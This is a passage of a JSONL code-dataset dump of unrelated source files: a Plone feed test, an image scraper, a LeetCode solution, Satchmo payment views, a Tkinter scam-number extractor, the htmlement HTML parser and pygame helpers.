self.portal.absolute_url()\n admin.open(portal_url)\n admin.getLink('Log in').click()\n admin.getControl(name='__ac_name').value = ptc.portal_owner\n admin.getControl(name='__ac_password').value = ptc.default_password\n admin.getControl('Log in').click()\n\n # Create a folder to act as the blog:\n admin.getLink(id='folder').click()\n admin.getControl(name='title').value = 'A Blog'\n admin.getControl(name='form.button.save').click()\n # Publish it:\n admin.getLink(id='workflow-transition-publish').click()\n # Save this url for easy access later:\n blog_url = admin.url\n \n # In the folder, create four content types, a Document, a News Item,\n # a File and an Event:\n admin.getLink(id='document').click()\n admin.getControl(name='title').value = 'A Document Blog Entry'\n admin.getControl(name='text').value = 'The main body of the Document'\n admin.getControl(name='form.button.save').click()\n admin.getLink(id='workflow-transition-publish').click()\n \n admin.open(blog_url)\n admin.getLink(id='news-item').click()\n admin.getControl(name='title').value = 'A News Item Blog Entry'\n admin.getControl(name='text').value = 'The main body of the News Item'\n testfile = os.path.join(os.path.dirname(__file__), 'testlogo.jpg')\n thefile = admin.getControl(name='image_file')\n thefile.filename = 'testlogo.jpg'\n thefile.value = open(testfile, 'rb')\n admin.getControl(name='form.button.save').click()\n admin.getLink(id='workflow-transition-publish').click()\n\n admin.open(blog_url)\n admin.getLink(id='file').click()\n admin.getControl(name='title').value = 'A File Blog Entry'\n testfile = os.path.join(os.path.dirname(__file__), 'testaudio.mp3')\n thefile = admin.getControl(name='file_file')\n thefile.filename = 'testaudio.mp3'\n thefile.value = open(testfile, 'rb')\n admin.getControl(name='form.button.save').click()\n\n admin.open(blog_url)\n admin.getLink(id='event').click()\n admin.getControl(name='title').value = 'An Event Blog Entry'\n admin.getControl(name='text').value = 'The main body of the Event'\n admin.getControl(name='form.button.save').click()\n admin.getLink(id='workflow-transition-publish').click()\n \n #############################\n ## Now, make sure things work\n #############################\n \n # First, check that the feeds are listed in the header:\n anon = testbrowser.Browser()\n anon.handleErrors = False\n anon.open(blog_url)\n self.assert_('atom.xml' in anon.contents)\n self.assert_('feed.rdf' in anon.contents)\n self.assert_('feed11.rdf' in anon.contents)\n self.assert_('rss.xml' in anon.contents)\n self.assert_('itunes.xml' in anon.contents)\n \n # Now check that the correct info is in the feeds. We'll assume that\n # basesyndication/fatsyndication is not broken, and check only rss.xml.\n anon.open(blog_url+'/rss.xml')\n # The document:\n self.assert_('The main body of the Document' in anon.contents)\n # The news item with image:\n self.assert_('The main body of the News Item' in anon.contents)\n self.assert_('/image' in anon.contents)\n # The file:\n self.assert_('>> ', end='')\n entry = input()\n if entry == \"quit\" or entry == \"q\":\n break\n if not entry.isdigit():\n print(\"Thats not a Number. Please try again\")\n else:\n if int(entry) <= 15:\n print(str(math.e)[0:int(entry)+2])\n else:\n print(math.e, \"| 15 is the max of after decimals\")\n\n\nif __name__ == '__main__':\n shell()\n","sub_path":"python/EDecimals.py","file_name":"EDecimals.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"406210115","text":"#coding:utf-8\nimport urllib.request\nimport urllib.parse\nimport re\nimport logging # 引入logging模块\ndef get_html(url):\n page = urllib.request.urlopen(url)\n htmlcode = page.read()\n htmlCode = htmlcode.decode('utf-8')\n return htmlCode\n # print(htmlcode)\n #写文件操作n\n # pageFile = open('pageCode.txt','wb+')\n # pageFile.write(htmlcode)\n # pageFile.close()\ndef logFunction():\n # 将信息打印到控制台上\n logging.debug(u\"苍井空\")\n logging.info(u\"麻生希\")\n logging.warning(u\"小泽玛利亚\")\n logging.error(u\"桃谷绘里香\")\n logging.critical(u\"泷泽萝拉\")\ndef myselfLogFunction():\n logging.basicConfig(level=logging.NOTSET)\n logger = logging.getLogger('')\n logger.setLevel(logging.NOTSET)\n logging.debug(u\"是否可以显示呢?\")\n logging.info(u\"这两条信息都应该被显示才对!\")\nif __name__ == '__main__':\n logFunction()\n myselfLogFunction()\n # reg = r'src=\"(.+?\\.jpg)\"width'\n # 加r表示后面的内容不被转义\n # reg = r'src=\"(.+?\\.jpg)\" width'\n reg = r'https://[^\\s]*?\\.jpg'\n reg_img = re.compile(reg)\n imgList = reg_img.findall(get_html('http://tieba.baidu.com/p/1753935195'))\n x = 0\n for img in imgList:\n print(img)\n urllib.request.urlretrieve(img,'D:\\Work\\Python\\Img\\%s.jpg' %x)\n x += 1\n\n","sub_path":"cnblog.py","file_name":"cnblog.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"536233203","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n #class변수 선언\n res: int=0\n \n def rangeSumBST(self, root: TreeNode, L: int, R: int) -> int:\n def DFS(root):\n if root is None:res=0\n stack=collections.deque([root])\n \n while stack:\n tmp=stack.pop()\n if (L<=tmp.val) and (tmp.val<=R):self.res+=tmp.val\n if tmp.left:stack.append(tmp.left)\n if tmp.right:stack.append(tmp.right)\n DFS(root)\n return self.res\n \n","sub_path":"leetcode/938_RangeSumofBST.py","file_name":"938_RangeSumofBST.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"167038072","text":"from decimal import Decimal\n\nfrom django.contrib import messages\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.utils.translation import gettext_lazy as _\nfrom django.views.generic import FormView, UpdateView\nfrom django.views.generic.detail import SingleObjectMixin\ntry:\n from django.core.urlresolvers import reverse\nexcept ImportError:\n from django.urls import reverse\n\nfrom livesettings.functions import config_get_group\nfrom payment import active_gateways\nfrom payment.forms import PaymentMethodForm, CustomChargeForm\nfrom satchmo_store.shop.models import Order, OrderItem\nfrom satchmo_utils.dynamic import lookup_url\nfrom satchmo_utils.views import bad_or_missing\nimport logging\n\nlog = logging.getLogger('payment.views.balance')\n \n \n# def balance_remaining_order(request, order_id=None):\n# \"\"\"Load the order into the session, so we can charge the remaining amount\"\"\"\n# # this will create an \"OrderCart\" - a fake cart to allow us to check out\n# request.session['cart'] = 'order'\n# request.session['orderID'] = order_id\n# return balance_remaining(request)\n \n\nclass BalanceRemainingView(SingleObjectMixin, FormView):\n model = Order\n template_name = \"shop/checkout/balance_remaining.html\"\n form_class = PaymentMethodForm\n context_object_name = \"order\"\n \n def get_object(self):\n try:\n return self.model.objects.get(pk=self.request.session.get('orderID'))\n except self.model.DoesNotExist:\n pass\n\n def dispatch(self, request, *args, **kwargs):\n self.object = self.get_object()\n if not self.object:\n return HttpResponseRedirect(reverse('satchmo_checkout-step1'))\n return super(BalanceRemainingView, self).dispatch(request, *args, **kwargs)\n \n def form_valid(self, form):\n modulename = form.cleaned_data['paymentmethod']\n if not modulename.startswith('PAYMENT_'):\n modulename = 'PAYMENT_' + modulename\n self.paymentmodule = config_get_group(modulename)\n return super(BalanceRemainingView, self).form_valid(form)\n \n def get_success_url(self):\n return lookup_url(self.paymentmodule, 'satchmo_checkout-step2')\n\n def get_form_kwargs(self):\n kwargs = super(BalanceRemainingView, self).get_form_kwargs()\n kwargs[\"order\"] = self.object\n return kwargs\n\n def get_context_data(self, **kwargs):\n context = super(BalanceRemainingView, self).get_context_data(**kwargs)\n context['paymentmethod_ct'] = len(active_gateways())\n return context\n\n\nclass BalanceRemainingOrderView(BalanceRemainingView):\n pk_url_kwarg = 'order_id'\n \n def dispatch(self, request, *args, **kwargs):\n request.session['cart'] = 'order'\n request.session['orderID'] = kwargs.get(self.pk_url_kwarg)\n return super(BalanceRemainingOrderView, self).dispatch(request, *args, **kwargs)\n \n \n# def balance_remaining(request):\n# \"\"\"Allow the user to pay the remaining balance.\"\"\"\n# order = None\n# orderid = request.session.get('orderID')\n# if orderid:\n# try:\n# order = Order.objects.get(pk=orderid)\n# except Order.DoesNotExist:\n# # TODO: verify user against current user\n# pass\n \n# if not order:\n# url = urlresolvers.reverse('satchmo_checkout-step1')\n# return HttpResponseRedirect(url)\n\n# if request.method == \"POST\":\n# new_data = request.POST.copy()\n# form = PaymentMethodForm(data=new_data, order=order)\n# if form.is_valid():\n# data = form.cleaned_data\n# modulename = data['paymentmethod']\n# if not modulename.startswith('PAYMENT_'):\n# modulename = 'PAYMENT_' + modulename\n \n# paymentmodule = config_get_group(modulename)\n# url = lookup_url(paymentmodule, 'satchmo_checkout-step2')\n# return HttpResponseRedirect(url)\n \n# else:\n# form = PaymentMethodForm(order=order)\n \n# ctx = {\n# 'form' : form, \n# 'order' : order,\n# 'paymentmethod_ct': len(active_gateways())\n# }\n# return render(request, 'shop/checkout/balance_remaining.html', ctx)\n\n\nclass ChargeRemainingUpdateView(UpdateView):\n template_name = 'payment/admin/charge_remaining_confirm.html'\n model = OrderItem\n form_class = CustomChargeForm\n pk_url_kwarg = 'orderitem_id'\n\n def get_form_kwargs(self):\n kwargs = super(ChargeRemainingUpdateView, self).get_form_kwargs()\n kwargs[\"orderitem\"] = self.object.pk\n kwargs[\"amount\"] = self.object.product.customproduct.full_price\n return kwargs\n \n def get_success_url(self):\n #return reverse('journal', kwargs={'year': self.object.date.year, 'month': self.object.date.month, 'day': self.object.date.day})\n return '/admin/shop/order/%i' % self.object.order.pk\n \n def form_valid(self, form):\n messages.add_message(self.request, messages.INFO, 'Charged for custom product and recalculated totals.')\n return super(ChargeRemainingUpdateView, self).form_valid(form)\n \n \ndef charge_remaining(request, orderitem_id):\n \"\"\"Given an orderitem_id, this returns a confirmation form.\"\"\"\n \n try:\n orderitem = OrderItem.objects.get(pk = orderitem_id)\n except OrderItem.DoesNotExist:\n return bad_or_missing(request, _(\"The orderitem you have requested doesn't exist, or you don't have access to it.\"))\n \n amount = orderitem.product.customproduct.full_price\n \n data = {\n 'orderitem' : orderitem_id,\n 'amount' : amount,\n }\n form = CustomChargeForm(data)\n return render(request, 'payment/admin/charge_remaining_confirm.html', {'form' : form})\n\ndef charge_remaining_post(request):\n if not request.method == 'POST':\n return bad_or_missing(request, _(\"No form found in request.\"))\n \n data = request.POST.copy()\n \n form = CustomChargeForm(data)\n if form.is_valid():\n data = form.cleaned_data\n try:\n orderitem = OrderItem.objects.get(pk = data['orderitem'])\n except OrderItem.DoesNotExist:\n return bad_or_missing(request, _(\"The orderitem you have requested doesn't exist, or you don't have access to it.\"))\n \n price = data['amount']\n line_price = price*orderitem.quantity\n orderitem.unit_price = price\n orderitem.line_item_price = line_price\n orderitem.save()\n #print(\"Orderitem price now: %s\" % orderitem.line_item_price)\n \n order = orderitem.order\n \n if not order.shipping_cost:\n order.shipping_cost = Decimal(\"0.00\")\n \n if data['shipping']:\n order.shipping_cost += data['shipping']\n \n order.recalculate_total()\n \n messages.add_message(request, messages.INFO, 'Charged for custom product and recalculated totals.')\n\n notes = data['notes']\n if not notes:\n notes = 'Updated total price'\n \n order.add_status(notes=notes)\n \n return HttpResponseRedirect('/admin/shop/order/%i' % order.id)\n else:\n return render(request, 'admin/charge_remaining_confirm.html', {'form': form})\n","sub_path":"satchmo/apps/payment/views/balance.py","file_name":"balance.py","file_ext":"py","file_size_in_byte":7354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"171335918","text":"# ============================================\n# Phone Number Extractor GUI\n#\n# Author: Slick\n# Date : 6/26/2020\n# ===============================================\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom tkinter import scrolledtext\nimport numpy as np\nimport datetime\nimport requests\nimport bs4\nimport csv\nimport re\nimport os\n\n\nclass NumExtApp:\n def __init__(self):\n # main window\n self.win = Tk()\n self.win.title('')\n self.win.configure(background='black')\n self.win.geometry('525x500')\n self.win.resizable(False, False)\n # the goods\n self.file_path = '/home/slick/textFiles/scammer_info.csv'\n self.add_widgets()\n\n def add_widgets(self):\n # create frames-----------------------------------------------------\n self.topframe = Frame(self.win, background='black')\n self.midframe = Frame(self.win, background='black')\n self.botframe = Frame(self.win, background='black')\n # pack frames\n self.topframe.pack(expand=1, fill=BOTH, padx=5, pady=2)\n self.midframe.pack(expand=1, fill=BOTH, padx=5)\n self.botframe.pack(expand=1, fill=BOTH)\n\n # add to top frame---------------------------------------------------\n self.title_label = Label(self.topframe, text='# Extractor 3000',\n font=('fixedsys', 20), bg='black', fg='white')\n self.title_label.pack(anchor='s', pady=35)\n\n self.url_label = Label(self.topframe, text='URL:',\n font=('fixedsys', 12), bg='black', fg='white')\n self.url_label.pack(side=LEFT, anchor='n', padx=10, pady=20)\n\n self.url_variable = StringVar()\n self.entrybox = Entry(self.topframe, width=43, textvariable=self.url_variable,\n bd=4, font=('times', 11))\n self.entrybox.pack(side=LEFT, anchor='n', pady=20)\n self.entrybox.insert(0, 'techscammersunited.com')\n\n # add top middle frame-----------------------------------------------------\n self.extr_button = Button(self.midframe, text='Extract', command=self.magic)\n self.clrbutton = Button(self.midframe, text='Clear', command=self.clear,\n width=7)\n self.extr_button.pack(side=LEFT, pady=15, padx=40)\n self.clrbutton.pack(side=RIGHT, padx=40)\n\n # add to bottom frame-----------------------------------------------------\n self.scrolltxt = scrolledtext.ScrolledText(self.botframe, height=18,\n width=75,\n font=('arial', 12, 'bold'))\n self.scrolltxt.pack()\n\n #A regex match for phone numbers------------------------------------------\n self.phoneNumRegex = re.compile(r'''(\n (\\d{3}|\\(\\d{3}\\))\n (\\s|-|\\.)?\n (\\d{3})\n (\\s|-|\\.)\n (\\d{4})\n )''', re.VERBOSE)\n\n def get_webpage(self):\n \"\"\"Grabs a webpage's HTML and saves it as text\"\"\"\n if 'https:' in self.url_variable.get().split('/'):\n self.webpage = requests.get(self.url_variable.get()).text\n else:\n self.webpage = requests.get('https://' + self.url_variable.get()).text\n\n def extract_(self):\n \"\"\"Extracts phone numbers from saved webpage and\n saves them in a list\"\"\"\n # creating Beautiful soup object\n self.scammer_soup = bs4.BeautifulSoup(self.webpage, features=\"html.parser\")\n # selecting info from page\n self.urls_and_nums = self.scammer_soup.select('div span a')\n self.scammer_types = self.scammer_soup.select('div span span')\n # making container to hold data\n self.data_list = []\n # displaying scam heading info\n for i in range(len(self.urls_and_nums) - 3):\n for data in self.urls_and_nums[i + 3]:\n self.data_list.append(data)\n # making container to hold scam types\n self.type_list = []\n for i in range(len(self.scammer_types) - 3):\n for data in self.scammer_types[i + 3]:\n self.type_list.append(data)\n # making container to hold numbers\n self.scammer_numbers = []\n for line in self.data_list:\n if self.phoneNumRegex.search(line):\n self.scammer_numbers.append(self.phoneNumRegex.search(line).group())\n else:\n self.scammer_numbers.append(None)\n\n self.scam_types = []\n for line in self.type_list:\n if line:\n self.scam_types.append(str(line.upper()))\n else:\n self.scam_types.append(None)\n\n # making arrays out of separated data\n self.scams = np.array(self.scam_types).reshape(len(self.scam_types), 1)\n self.nums = np.array(self.scammer_numbers[:-1]).reshape(len(self.scammer_numbers) - 1, 1)\n self.dates = np.array([str(datetime.date.today()) for x in self.nums]).reshape(len(self.scam_types), 1)\n\n # taking all data and matching attributes together (scam_type, phone_num,\n # and date)\n self.data = np.hstack([self.scams, self.nums, self.dates])\n\n def save2file(self):\n \"\"\"Saves extracted data to .csv file\"\"\"\n if os.path.exists(self.file_path):\n # make a csv reader and writer\n with open(self.file_path) as csv_file_text:\n csv_reader = csv.reader(csv_file_text, delimiter='\\t')\n with open(self.file_path, 'a') as csv_file:\n csv_writer = csv.writer(csv_file, delimiter='\\t')\n # making a list of all numbers ALREADY collected\n file_nums = [row[1] for row in csv_reader]\n # if the phone number isn't already there, add it\n for row in self.data:\n type_, num, date = row\n if 'SCAM' in type_ and 'TOOL' not in type_ and num and \\\n num not in file_nums and 'DEAD' not in type_:\n csv_writer.writerow(row)\n # if no database file, will create one\n else:\n # create a csv writer\n with open(self.file_path, 'a') as csv_file:\n csv_writer = csv.writer(csv_file, delimiter='\\t')\n # add categories\n csv_writer.writerow(['Scam Type', 'Phone Number', 'Date'])\n # add all collected data\n for row in self.data:\n type_2, num2, date2 = row\n if 'SCAM' in type_2 and 'TOOL' not in type_2 and num2:\n csv_writer.writerow(row)\n\n def display(self):\n \"\"\"Displays extracted numbers in scroll text widget\"\"\"\n if len(self.data) > 0:\n self.scrolltxt.insert(INSERT, f'<<{self.url_variable.get()}>>\\n\\n')\n title1, title2, title3 = ['Type', 'Phone Number', 'Date']\n self.scrolltxt.insert(INSERT, ('-' * 50) + '\\n')\n self.scrolltxt.insert(INSERT, f'{title1:^21}| {title2:^15}| {title3:^8}' + '\\n')\n self.scrolltxt.insert(INSERT, ('-' * 50) + '\\n')\n for type_, num, date in self.data:\n if num:\n self.scrolltxt.insert(INSERT, f'{type_:<21}| {num:15}| {date:8}' + '\\n')\n self.scrolltxt.insert(INSERT, ('-'*50) + '\\n')\n self.scrolltxt.insert(INSERT, f'\\n<<{self.url_variable.get()}>>\\n')\n self.entrybox.delete(0, END)\n else:\n messagebox.showerror(message='Sorry! No Luck...')\n\n def magic(self):\n \"\"\"The whole sha bang\"\"\"\n try:\n self.get_webpage()\n self.extract_()\n self.save2file()\n self.display()\n except:\n messagebox.showerror('Error', 'Please enter a full valid url')\n\n def clear(self):\n self.scrolltxt.delete('1.0', END)\n\n\napp = NumExtApp()\napp.win.mainloop()\n","sub_path":"phone_num_ex_GUI.py","file_name":"phone_num_ex_GUI.py","file_ext":"py","file_size_in_byte":7995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"619880582","text":"from django import forms\n\n\nclass SubjectForm(forms.Form):\n\n subject = forms.CharField(\n error_messages={\n 'required': '진료과목을 선택해주세요'\n },\n label='진료과목'\n )\n\n def clean(self):\n cleaned_data = super().clean()\n subject = cleaned_data.get('subject')\n\n if subject:\n if subject not in [\"피부과\", \"성형외과\", \"이비인후과\", \"내과\", \"소아청소년과\", \"정형외과\", \"안과\", \"치과\", \"한의원\",\"산부인과\", \"비뇨기과\", \"정신건강의학과\", \"가정의학과\", \"외과\", \"신경외과\", \"마취통증의학과\", \"신경과\"]:\n self.add_error('subject','없는 진료과목 입니다')\n\n\n\n","sub_path":"analysis_web/competitiveness/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"460828985","text":"#!/usr/bin/env python\n\"\"\"\nThe MIT License (MIT)\n\nCopyright (c) 2013 Rafael Marmelo\nCopyright (c) 2016 William Forde\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of\nthis software and associated documentation files (the \"Software\"), to deal in\nthe Software without restriction, including without limitation the rights to\nuse, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of\nthe Software, and to permit persons to whom the Software is furnished to do so,\nsubject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR\nCOPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER\nIN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\nCONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\n\n# Python 2 compatibility\nfrom __future__ import unicode_literals\n\n# Standard library imports\nimport warnings\nimport sys\nimport re\n\n# Import the faster C implementation of ElementTree whenever available\ntry:\n from xml.etree import cElementTree as Etree\nexcept ImportError:\n from xml.etree import ElementTree as Etree\n\n# Check python version to set the object that can detect non unicode strings\nif sys.version_info >= (3, 0):\n # noinspection PyCompatibility\n from html.parser import HTMLParser\nelse:\n # noinspection PyUnresolvedReferences,PyUnresolvedReferences,PyCompatibility\n from HTMLParser import HTMLParser\n\n# When using 'from htmlement import *'\n__all__ = [\"HTMLement\", \"HTMLParseError\", \"fromstring\", \"fromstringlist\", \"make_unicode\"]\n\n\ndef fromstring(text, tag=None, attrs=None):\n \"\"\"\n Parses an HTML Source into an element tree from a string.\n\n *text* is a string containing html data,\n Refer to :class:'HTMLement' for all other arguments\n \"\"\"\n parser = HTMLement(tag, attrs)\n parser.feed(text)\n return parser.close()\n\n\ndef fromstringlist(sequence, tag=None, attrs=None):\n \"\"\"\n Parses an HTML Source into an element tree from a sequence of strings.\n\n *sequence* is a sequence of strings containing html data,\n Refer to :class:'HTMLement' for all other arguments\n \"\"\"\n parser = HTMLement(tag, attrs)\n for text in sequence:\n parser.feed(text)\n return parser.close()\n\n\ndef parse(source, tag=None, attrs=None):\n \"\"\"\n Load external HTML document into element tree.\n\n *source* is a file name or file object\n \"\"\"\n # Assume that source is a file pointer if no read methods is found\n if hasattr(source, \"read\"):\n source = open(source, \"rb\")\n close_source = True\n else:\n close_source = False\n\n try:\n parser = HTMLement(tag, attrs)\n while True:\n # Read in 64k at a time\n data = source.read(65536)\n if not data:\n break\n\n # Feed the parser\n parser.feed(data)\n\n # Return the root element\n return parser.close()\n\n finally:\n if close_source:\n source.close()\n\n\ndef make_unicode(source, encoding=None, default_encoding=\"iso-8859-1\"):\n \"\"\"\n Turn's html source into unicode if not already unicode.\n\n If source is not unicode and no encoding is specified then the encoding\n will be extracted from the html source meta tag if available.\n Will default to iso-8859-1 if unable to find encoding.\n\n Parameters\n ----------\n source : basestring\n The html source data\n\n encoding : str, optional\n The encoding used to convert html source to unicode\n\n default_encoding : str, optional(default=\"iso-8859-1\")\n The default encoding to use if no encoding was specified and\n was unable to extract the encoding from the html source.\n \"\"\"\n if not isinstance(source, bytes):\n return source\n\n elif encoding is None:\n # Atemp to find the encoding from the html source\n end_head_tag = source.find(b\"\")\n if end_head_tag:\n # Search for the charset attribute within the meta tags\n charset_refind = b''\n charset = re.search(charset_refind, source[:end_head_tag], re.IGNORECASE)\n if charset:\n encoding = charset.group(1)\n else:\n warn_msg = \"Unable to determine encoding, defaulting to {}\".format(default_encoding)\n warnings.warn(warn_msg, UnicodeWarning, stacklevel=1)\n else:\n warn_msg = \"Unable to determine encoding, defaulting to {}\".format(default_encoding)\n warnings.warn(warn_msg, UnicodeWarning, stacklevel=1)\n\n # Decode the string into unicode\n return source.decode(encoding if encoding else default_encoding)\n\n\n# Required for raiseing HTMLParseError in python3, emulates python2\nclass HTMLParseError(Exception):\n \"\"\"Exception raised for all parse errors.\"\"\"\n def __init__(self, msg, position=(None, None)):\n self.msg = msg\n self.lineno = position[0]\n self.offset = position[1]\n\n def __str__(self):\n result = self.msg\n if self.lineno is not None:\n result += \", at line %d\" % self.lineno\n if self.offset is not None:\n result += \", column %d\" % self.offset\n return result\n\n\nclass HTMLement(object):\n \"\"\"\n Python HTMLParser extension with ElementTree support.\n @see https://github.com/willforde/python-htmlement\n\n This HTML Parser extends html.parser.HTMLParser returning an xml.etree.ElementTree.Element instance.\n The returned root element natively supports the ElementTree API.\n (e.g. you may use its limited support for XPath expressions)\n\n @see https://docs.python.org/3/library/xml.etree.elementtree.html#xml.etree.ElementTree.Element\n @see https://docs.python.org/3/library/xml.etree.elementtree.html#xpath-support\n \"\"\"\n def __init__(self, tag=None, attrs=None):\n self._parser = ParseHTML(tag, attrs)\n self.finished = False\n\n def feed(self, source):\n \"\"\"Feeds data to the parser. data is unicode data.\"\"\"\n # Skip feeding data into parser if we already have what we want\n if self.finished is True:\n return None\n\n # Make sure that we have unicode before continuing\n if isinstance(source, bytes):\n raise ValueError(\"HTML source must be unicode not string. Please feed me unicode\")\n\n # Parse the html document\n try:\n self._parser.feed(source)\n except EOFError:\n self.finished = True\n self._parser.reset()\n\n def close(self):\n # Close the tree builder and return the root element that is returned by the treebuilder\n return self._parser.close()\n\n\nclass ParseHTML(HTMLParser):\n def __init__(self, tag, attrs):\n # Initiate HTMLParser\n HTMLParser.__init__(self)\n self.convert_charrefs = True\n self._root = None # root element\n self._data = [] # data collector\n self._factory = Etree.Element\n\n # Split attributes into wanted and unwanted attributes\n self._unw_attrs = [attrs.pop(key) for key, value in attrs.items() if value is False] if attrs else []\n self.attrs = attrs if attrs else {}\n self.enabled = not tag\n self.tag = tag\n\n # Some tags in html do not require closing tags so thoes tags will need to be auto closed (Void elements)\n # Refer to: https://www.w3.org/TR/html/syntax.html#void-elements\n self._voids = frozenset((\"area\", \"base\", \"br\", \"col\", \"hr\", \"img\", \"input\", \"link\", \"meta\", \"param\",\n # Only in HTML5\n \"embed\", \"keygen\", \"source\", \"track\",\n # Not supported in HTML5\n \"basefont\", \"frame\", \"isindex\",\n # SVG self closing tags\n \"rect\", \"circle\", \"ellipse\", \"line\", \"polyline\", \"polygon\",\n \"path\", \"stop\", \"use\", \"image\", \"animatetransform\"))\n\n # Create temporary root element to protect from badly written sites that either\n # have no html starting tag or multiple top level elements\n elem = self._factory(\"html\")\n self._elem = [elem]\n self._last = elem\n self._tail = 0\n\n def handle_starttag(self, tag, attrs, self_closing=False):\n enabled = self.enabled\n # Add tag element to tree if we have no filter or that the filter matches\n if enabled or self._search(tag, attrs):\n # Convert attrs to dictionary\n attrs = dict(attrs) if attrs else {}\n self._flush()\n\n # Create the new element\n elem = self._factory(tag, attrs)\n self._elem[-1].append(elem)\n self._last = elem\n\n # Only append the element to the list of elements if it's not a self closing element\n if self_closing or tag in self._voids:\n self._tail = 1\n else:\n self._elem.append(elem)\n self._tail = 0\n\n # Set this element as the root element when the filter search matches\n if not enabled:\n self._root = elem\n self.enabled = True\n\n def handle_startendtag(self, tag, attrs):\n self.handle_starttag(tag, attrs, self_closing=True)\n\n def handle_endtag(self, tag):\n # Only process end tags when we have no filter or that the filter has been matched\n if self.enabled and tag not in self._voids:\n _elem = self._elem\n _root = self._root\n # Check that the closing tag is what's actualy expected\n if _elem[-1].tag == tag:\n self._flush()\n self._tail = 1\n self._last = elem = _elem.pop()\n if elem is _root:\n raise EOFError\n\n # If the previous element is what we actually have then the expected element was not\n # properly closed so we must close that before closing what we have now\n elif len(_elem) >= 2 and _elem[-2].tag == tag:\n self._flush()\n self._tail = 1\n for i in range(2):\n self._last = elem = _elem.pop()\n if elem is _root:\n raise EOFError\n else:\n # Unable to match the tag to an element, ignoring it\n return None\n\n def handle_data(self, data):\n data = data.strip()\n if data and self.enabled:\n self._data.append(data)\n\n def handle_comment(self, data):\n data = data.strip()\n if data and self.enabled:\n elem = Etree.Comment(data)\n self._elem[-1].append(elem)\n\n def close(self):\n self._flush()\n if self._root is not None:\n return self._root\n else:\n # Search the root element to find a proper html root element if one exists\n tmp_root = self._elem[0]\n proper_root = tmp_root.find(\"html\")\n if proper_root is None:\n # Not proper root was found\n return tmp_root\n else:\n # Proper root found\n return proper_root\n\n def error(self, message):\n raise HTMLParseError(message, self.getpos())\n\n def _flush(self):\n if self._data:\n if self._last is not None:\n text = \"\".join(self._data)\n if self._tail:\n self._last.tail = text\n else:\n self._last.text = text\n self._data = []\n\n def _search(self, tag, attrs):\n # Only search when the tag matches\n if tag == self.tag:\n # If we have required attrs to match then search all attrs for wanted attrs\n # And also check that we do not have any attrs that are unwanted\n if self.attrs or self._unw_attrs:\n if attrs:\n wanted_attrs = self.attrs.copy()\n unwanted_attrs = self._unw_attrs\n for key, value in attrs:\n # Check for unwanted attrs\n if key in unwanted_attrs:\n return False\n\n # Check for wanted attrs\n elif key in wanted_attrs:\n c_value = wanted_attrs[key]\n if c_value == value or c_value is True:\n # Remove this attribute from the wanted dict of attributes\n # to indicate that this attribute has been found\n del wanted_attrs[key]\n\n # If wanted_attrs is now empty then all attributes must have been found\n if not wanted_attrs:\n return True\n else:\n # We only need to match tag\n return True\n\n # Unable to find required section\n return False\n","sub_path":"htmlement.py","file_name":"htmlement.py","file_ext":"py","file_size_in_byte":13383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"235522781","text":"\nimport pygame as pg \nimport sys\nfrom bullet import Bullet\n\n\n# Function that handles the ship's navegation system\ndef navegation(ship, screen, bullets) :\n\t\n\n\tfor event in pg.event.get() :\n\t\t# TO QUIT\n\t\tif event.type == pg.QUIT :\n\t\t\tsys.exit()\n\t\t# TO MOVE RIGHT\n\t\tif event.type == pg.KEYDOWN :\n\t\t\tif event.key == pg.K_RIGHT: \n\t\t\t\tship.moving_right =True\n\t\t\tif event.key == pg.K_SPACE :\n\t\t\t\t#Creating a bullet and adding it to the bullet group created at Game file\n\t\t\t\tif len(bullets) < ship.bullet_allowed :\n\t\t\t\t\tnew_bullet = Bullet(screen, ship)\n\t\t\t\t\tbullets.add(new_bullet)\n\t\t\t\t\n\n\t\t# TO STOP MOVING RIGHT\t\t\n\t\tif event.type == pg.KEYUP :\n\t\t\tif event.key == pg.K_RIGHT: \n\t\t\t\tship.moving_right =False\n\n\t\t# TO MOVE LEFT\n\t\tif event.type == pg.KEYDOWN :\n\t\t\tif event.key == pg.K_LEFT: \n\t\t\t\tship.moving_left =True\n\t\t# TO STOP MOVING RIGHT\t\t\n\t\tif event.type == pg.KEYUP :\n\t\t\tif event.key == pg.K_LEFT: \n\t\t\t\tship.moving_left =False\t\n\t\t# TO FIRE THE BULLETS\n\n\n\n# Function that redraw the screen \ndef update_screen(ship, screen, bullets) :\n\n\tfor bullet in bullets.sprites() :\n\t\tbullet.draw_bullet()\n\n\n\ndef text_object(text, font) :\n\tred = (255,0,0)\n\tblack =(0,0,0)\n\twhite =(255,255,255)\n\tcolor ={\"red\" :red, \"black\" : black, \"white\": white }\n\ttextSurface = font.render(text, True, color[\"red\"])\n\treturn textSurface, 